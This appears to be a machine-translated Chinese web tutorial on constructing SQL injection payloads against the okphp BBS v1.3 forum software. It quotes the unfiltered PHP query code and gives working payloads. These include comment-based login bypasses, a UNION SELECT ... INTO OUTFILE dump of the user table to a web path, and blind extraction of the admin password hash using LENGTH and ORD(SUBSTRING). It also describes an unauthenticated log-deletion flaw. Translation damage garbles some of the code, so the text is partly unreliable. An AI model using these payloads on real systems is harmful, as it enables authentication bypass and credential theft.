Attack method: Discussion on Php+mysql injection statement Construction _php Tutorial

I. Preface:

Version info: okphp BBS v1.3 Open source version

Due to the reasons of PHP and MySQL itself, php+mysql injection is more difficult than ASP, especially the construction of the sentence at the time of injection is a difficult point, this article is mainly to okphp BBS v1.3 Some documents to be simple analysis, to talk about Php+mysql Injection statement construction method, I hope this article will help you a little.

Disclaimer: All of the "loopholes" mentioned in the article have not been tested and may not exist at all, in fact, there is no loophole is not important, it is important to analyze ideas and sentence construction.

Two. " Vulnerability Analysis:

1.admin/login.php injection results in bypassing the authentication vulnerability:

Code:

$conn =sql_connect ($dbhost, $dbuser, $DBPSWD, $dbname);

$password = MD5 ($password);

$q = "Select id,group_id from $user _table where username= $username and password= $password";

$res = Sql_query ($q, $conn);

$row = Sql_fetch_row ($res);

$q = "Select id,group_id from $user _table where username= $username and password= $password"

$username and $password are not filtered and are easily bypassed. (Bkjia Chinese web)

For a SELECT * from $user _table where username= $username and password= $password Such statements are modified by:

Construction 1 (with logical operations): $username = or a=a $password = or a=a

Equivalent to the SQL statement:

SELECT * from $user _table where username= or A=a and password= or a=a

Construct 2 (Use the comment statement in MySQL #,/* to comment out $password): $username =admin# (or admin/*)

That

SELECT * from $user _table where username=admin# and password= $password "

Equivalent:

SELECT * from $user _table where username=admin

The $password in the $Q statement in admin/login.php is MD5 encrypted before querying, so it is not possible to bypass the statements in construct 1. Here we use Construction 2:

Select id,group_id from $user _table where username=admin# and password= $password "

Equivalent:

Select id,group_id from $user _table where username=admin

As long as there is a user named admin is established, if you do not know the user name, only know the corresponding ID,

We can construct this: $username = OR id=1#

Equivalent:

Select id,group_id from $user _table where username= OR id=1# and password= $password (#后的被注释掉)

We then look at the code:

if ($row [0]) {

If not admin or Super Moderator

if ($username! = "Admin" &&!eregi ("(^|&) 3 ($|&)", $row [1])) {

$login = 0;

}

else {

$login = 1;

}

}

Fail to login---------------

if (! $login) {

Write_log ("Moderator login", "0", "password Wrong");

echo "";

Exit ();

}

Access! -------------

else {

Session_Start ();

At last, it is simple to judge by a $login, we can bypass the:) as long as IE submits the $login=1 directly.

2.users/login.php injection results in bypassing the authentication vulnerability:

Code:

$MD 5password = MD5 ($password);

$q = "Select Id,group_id,email from $user _table where username= $username and password= $md 5password";

$res = Sql_query ($q, $conn);

$row = Sql_fetch_row ($res);

$username not filtered using the same 1 password= $md 5password ";

3.adminloglist.php there is an arbitrary delete log record vulnerability. (PS: This elephant and php+mysql injection unrelated, casually mention) (Bkjia Chinese web)

Okphp backstage seems to write very sloppy, all the files are not judged whether the administrator has landed, so that arbitrary access. We look at the list.php code:

$arr = Array ("Del_log", "log_id", "del_id");

Get_r ($arr);

//

if ($del _log) {

Omitted........

if ($log _id) {

foreach ($log _id as $val) {

$q = "Delete from $log _table where id= $val";

$res = Sql_query ($q, $conn);

if ($res) {

$i + +;

}

}

}

ElseIf ($del _id) {

$q = "Delete from $log _table where id= $del _id";

$res = Sql_query ($q, $conn);

}

$TPL->setvariable ("message", "$i log deleted ok!");

$TPL->setvariable ("Action", "Index.php?action=list_log");

}

The code is simply used Get_r ($arr), the argument of the submitted parameters, we just submit the corresponding $del_log, $log _id, $del _id. The delete succeeds on the back.

4. Multiple file-to-variable non-filtering results in a SQL injection vulnerability.

Okphp's authors do not seem to like filtering:). Basically all the variables in the SQL statements are "naked". I will not list the specific documents, please look at the code, I will use forumslist_threads.php as an example to briefly talk about.

Look at the list_threads.php code:

$q = "Select Name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num, Post_num from $type _table where id= $forum _id ";

$res = Sql_query ($q, $conn);

$row = Sql_fetch_row ($res);

Variable $forum_id is not filtered, because MySQL does not support subqueries, we can use union construction statements for Federated queries (requires MySQL version above 4.00) to achieve cross-library operations, we construct the following:

Construction 1: Use SELECT * from table to Outfile/path/file.txt (requires MySQL to have file permissions, note in the win system to absolute path, such as: C://path//file.txt). Enter the contents of the query into File.txt, and then we can access the results of the query by Http://ip/path/file.txt. Above we can construct the $forum_id:

$forum _id= Union SELECT * FROM User_table to Outfile/path/file.txt

Following:

$q = "Select Name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num, Post_num from $type _table where id= $forum _id Union SELECT * FROM user_table to Outfile/path/file.txt "; (bkjia.com)

The above approach is demanding, you have to get the path to the Web (which can usually be obtained by submitting the wrong variable for MySQL error), and the PHP magic_gpc=on option prevents single quotes from appearing in the injection. If Magic_gpc=on we can also bypass:

Construction 2: Just like the ASP cross-Library query, directly using the Union select constructs the statement, the return result is different to guess, this method can bypass single quotation marks (Magic_gpc=on) continue to inject, but in PHP this injection is relatively difficult, depending on the specific code. Please refer to Pinkeyes's article "PHP Injection example" for specific sentence construction. I'll combine okphp with an example of a "different return" injection: (see vulnerability 5).

5.admin/login.php and users/login.php through the SQL statement constructs can guess to get the specified user password hash: (In fact this and vulnerability 1 and 2 is the same, here alone, mainly to illustrate the method of statement construction.) )

The problem code is the same as vulnerability 1.

Statement Construction (PS: Because the statement itself is a user library operation is not necessary to use Union):

$username =admin and LENGTH (password) =6#

The SQL statement becomes:

$q = "Select id,group_id from $user _table where username=admin and LENGTH (password) =6# and password= $password"

Equivalent:

$q = "Select id,group_id from $user _table where username=admin and LENGTH (password) =6"

If length (password) =6 is established, then normal return, if not, MySQL will error.

So we can guess the user admin password hash. such as $username=admin ord (substring (password,1,1)) =57#

You can guess the ASCII value of the first bit of the user's password ...

http://www.bkjia.com/PHPjc/486471.html www.bkjia.com true http://www.bkjia.com/PHPjc/486471.html techarticle Preface: Version information: okphp BBS v1.3 Open source version due to PHP and MySQL itself, php+mysql injection is more difficult than ASP, especially when the construction of the sentence is a difficult point, this ...

